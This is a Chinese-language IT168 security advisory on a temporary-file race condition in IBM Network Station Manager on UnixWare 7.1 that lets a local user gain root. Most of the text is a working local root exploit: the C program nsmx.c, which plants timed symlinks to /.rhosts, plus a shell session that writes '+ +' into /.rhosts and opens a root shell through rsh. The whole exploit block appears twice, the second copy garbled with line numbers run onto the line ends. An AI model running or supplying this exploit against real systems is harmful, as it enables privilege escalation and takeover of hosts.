【IT168 资讯】
受影响系统:
NetStation on UnixWare 7.1
描述:
IBM Network Station Manager存在可让本地用户获取根用户权限的安全漏洞。
NetStation在创建临时文件时没有使用安全的mktemp函数,它只是简单地将当前时间(秒)附加到已知文件名后。这是一个“竞争条件”安全漏洞。通常对于那些以nobody或同类权限运行的守护程序来说,这个漏洞不会造成太大问题。但NetStation必须由root运行,从而有打开/修改特定用户文件的权限。攻击者可以利用从xnec.nsu.到/.rhosts的强制符号链接,最终获取root权限。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1
bash-2.02$ ls /usr/netstation/nsm/users/xnec
2 UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file or directory
3 <连接到 http://localhost:880 登录>
4 Workstation>
5 bash-2.02$ ls /usr/netstation/nsm/users/xnec
6 xnec.nsu xnec.usr
7 bash-2.02$ cc -o nsmx nsmx.c
8 bash-2.02$ ./nsmx
9 <再次单击Workstation>
10 bash-2.02$ ls -la /.rhosts
11 -rwx------ 1 xnec other 0 Dec 28 06:19 /.rhosts
12 bash-2.02$ echo "+ +" > /.rhosts
13 bash-2.02$ chown root /.rhosts
14 bash-2.02$ rsh -l root localhost sh -i
15 # id
16 uid=0(root) gid=3(sys)
17 groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit)
18 ,10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
19 #
20 /* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
21 *
22 * Exploits a temporary file race condition in NetStation's HTTP interface
23 *
24 * To exploit: first, change the paths below to reflect your individual
25 * settings/paths. Don't worry if .nsu doesn't exist, NS will
26 * create it for you. Next, point your browser at
27 * http://localhost:880 and login as a normal user. Click on "Hardware"
28 * Then "workstation". This will create /users/xnec.
29 * Next, compile and run this program. You only have thirty seconds from
30 * the time you complete this step to then click on "Workstation". When
31 * this is done, you should have an /.rhosts which you own. On some
32 * UnixWare systems, you may need to chown root /.rhosts in order to do
33 * rsh -l root localhost sh -i.
34 *
35 * Brock Tellier btellier@usa.net
36 *
37 */
38 #include
39 #include
40 #include
41 #include
42 void main() {
43 /* Change these paths */
44 char dest[20] = "/.rhosts";
45 char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
46 char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
47 long sec;
48 int i;
49 sec = time(0);
50 for (i = 0; i < 30; i++) {
51 sprintf(sourcesym, "%s%d", source, (sec + i));
52 symlink(dest,sourcesym);
53 }
54 }
55
bash-2.02$ ls /usr/netstation/nsm/users/xnec2
UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file or directory3
<连接到 http://localhost:880 登录>4
Workstation>5
bash-2.02$ ls /usr/netstation/nsm/users/xnec6
xnec.nsu xnec.usr7
bash-2.02$ cc -o nsmx nsmx.c8
bash-2.02$ ./nsmx9
<再次单击Workstation>10
bash-2.02$ ls -la /.rhosts11
-rwx------ 1 xnec other 0 Dec 28 06:19 /.rhosts12
bash-2.02$ echo "+ +" > /.rhosts13
bash-2.02$ chown root /.rhosts14
bash-2.02$ rsh -l root localhost sh -i15
# id16
uid=0(root) gid=3(sys)17
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit)18
,10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)19
#20
/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit21
*22
* Exploits a temporary file race condition in NetStation's HTTP interface23
*24
* To exploit: first, change the paths below to reflect your individual25
* settings/paths. Don't worry if .nsu doesn't exist, NS will26
* create it for you. Next, point your browser at27
* http://localhost:880 and login as a normal user. Click on "Hardware"28
* Then "workstation". This will create /users/xnec.29
* Next, compile and run this program. You only have thirty seconds from30
* the time you complete this step to then click on "Workstation". When31
* this is done, you should have an /.rhosts which you own. On some32
* UnixWare systems, you may need to chown root /.rhosts in order to do33
* rsh -l root localhost sh -i.34
*35
* Brock Tellier btellier@usa.net36
*37
*/38
#include39
#include40
#include41
#include42
void main() {43
/* Change these paths */44
char dest[20] = "/.rhosts";45
char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";46
char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";47
long sec;48
int i;49
sec = time(0);50
for (i = 0; i < 30; i++) {51
sprintf(sourcesym, "%s%d", source, (sec + i));52
symlink(dest,sourcesym);53
}54
}55
建议:
暂无。
